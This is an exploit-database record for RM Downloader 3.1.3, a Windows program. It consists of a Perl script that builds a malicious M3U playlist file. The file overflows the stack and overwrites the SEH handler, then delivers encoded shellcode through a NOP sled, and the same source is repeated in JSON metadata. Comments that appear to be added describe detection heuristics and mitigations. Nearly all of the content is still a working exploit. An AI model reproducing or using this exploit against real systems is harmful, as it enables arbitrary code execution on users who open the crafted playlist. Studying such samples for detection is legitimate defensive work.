ID 1337DAY-ID-13005
Type zdt
Reporter MadjiX
Modified 2010-06-27T00:00:00
Description
Exploit for windows platform in category local exploits
=========================================
RM Downloader 3.1.3 Buffer Overflow (SEH)
=========================================
#!/usr/bin/perl
#RM Downloader 3.1.3 Local stack BOF
#Download : http://www.mini-stream.net/downloads/RMDownloader.exe
#By Madjix Dz8[at]hotmail[dot]com
#
# Purpose: proof-of-concept generator. It concatenates a fixed byte string and
# appends it to a playlist file named MadjiX.m3u in the current directory.
# Nothing is executed by this script itself; the page title describes the
# target condition as a stack buffer overflow reached through an SEH overwrite
# when RM Downloader 3.1.3 opens the file.
#
# Defender notes:
#   - The record on this page lists no CVE (its "cvelist" is empty), so track
#     the issue by product/version and by this advisory ID.
#   - Artefact shape as written below: the "#EXTM3U" header line followed by a
#     single unterminated entry of well over 60 KB, made up mostly of 0x41 and
#     0x90 bytes. A playlist entry of that size with long single-byte runs is
#     a usable file-scanning heuristic.
#   - The root cause class is an unbounded copy of a playlist entry; the fix on
#     the parser side is a length check before copying. Platform mitigations
#     for this class are SafeSEH/SEHOP, DEP and ASLR.

# M3U extended-playlist header line, so the file is parsed as a playlist.
my $hd = "#EXTM3U\n" ;
# 43488 filler bytes (0x41). Presumably the distance to the exception
# registration record in the author's test setup - not stated on the page.
my $jnk="\x41" x 43488 ;
# Four bytes for the record's "next" field (per the variable name): an x86
# short jump (EB 06) followed by two 0x90 bytes.
my $nseh="\xeb\x06\x90\x90" ;
# Four bytes for the handler field, i.e. little-endian 0x7C87BE16. The page
# does not say which module this hard-coded address belongs to.
# NOTE(review): an absolute address like this ties the PoC to one specific
# module build and load address - confirm before relying on the sample.
my $seh="\x16\xBE\x87\x7C" ;
# 24 bytes of 0x90 placed between the record and the payload.
my $nops = "\x90" x 24 ;
# Opaque payload bytes. The page gives no description of what they do, so their
# behaviour is unverified here.
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
# 20000 trailing bytes of 0x90 appended after the payload.
my $pd= "\x90" x 20000 ;
# Bareword handle, mode embedded in the filename argument, and the return value
# of open is not checked. The mode is append (>>), so an existing MadjiX.m3u is
# extended rather than replaced.
open(MYFILE,'>>MadjiX.m3u');
# Output order: header, filler, next-field bytes, handler bytes, 0x90 run,
# payload, trailing 0x90 run.
print MYFILE $hd.$jnk.$nseh.$seh.$nops.$shellcode.$pd;
close(MYFILE);
# 0day.today [2018-02-19] #
{"published": "2010-06-27T00:00:00", "id": "1337DAY-ID-13005", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category local exploits", "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2018-02-19T23:25:23", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2017-0606-1.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:6E46A05627B4B870228F4C53DD7811AE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:3125", "SECURITYVULNS:DOC:13005"]}], "modified": "2018-02-19T23:25:23", "rev": 2}, "vulnersScore": 1.2}, "type": "zdt", "lastseen": "2018-02-19T23:25:23", "edition": 2, "title": "RM Downloader 3.1.3 Buffer Overflow (SEH)", "href": "https://0day.today/exploit/description/13005", "modified": "2010-06-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/13005", "references": [], "reporter": "MadjiX", "sourceData": "=========================================\r\nRM Downloader 3.1.3 Buffer Overflow (SEH)\r\n=========================================\r\n\r\n\r\n#!/usr/bin/perl\r\n#RM Downloader 3.1.3 Local stack BOF\r\n#Download : http://www.mini-stream.net/downloads/RMDownloader.exe\r\n#By Madjix Dz8[at]hotmail[dot]com\r\nmy $hd = \"#EXTM3U\\n\" ;\r\nmy $jnk=\"\\x41\" x 43488 ;\r\nmy $nseh=\"\\xeb\\x06\\x90\\x90\" ;\r\nmy $seh=\"\\x16\\xBE\\x87\\x7C\" ;\r\nmy $nops = \"\\x90\" x 24 ;\r\nmy $shellcode= \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\\xd9\\x74\\x24\\xf4\\xb1\" .\r\n\"\\x1e\\x58\\x31\\x78\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\\x30\" .\r\n\"\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\\xf3\\xb4\\xae\\x7d\\x02\\xaa\" .\r\n\"\\x3a\\x32\\x1c\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\\xe7\\x96\" .\r\n\"\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\" .\r\n\"\\xf0\\x27\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\\xf7\\x3b\\x7a\" 
.\r\n\"\\xcf\\x4c\\x4f\\x23\\xd3\\x53\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\" .\r\n\"\\x1f\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\\xf5\\xc1\\x7e\\x98\" .\r\n\"\\xf5\\xaa\\xf1\\x05\\xa8\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\" .\r\n\"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\\x59\\x90\\x7b\\xd7\\x05\" .\r\n\"\\x7f\\xe8\\x7b\\xca\";\r\nmy $pd= \"\\x90\" x 20000 ;\r\n \r\nopen(MYFILE,'>>MadjiX.m3u');\r\nprint MYFILE $hd.$jnk.$nseh.$seh.$nops.$shellcode.$pd;\r\nclose(MYFILE);\r\n\r\n\n\n# 0day.today [2018-02-19] #"}
{}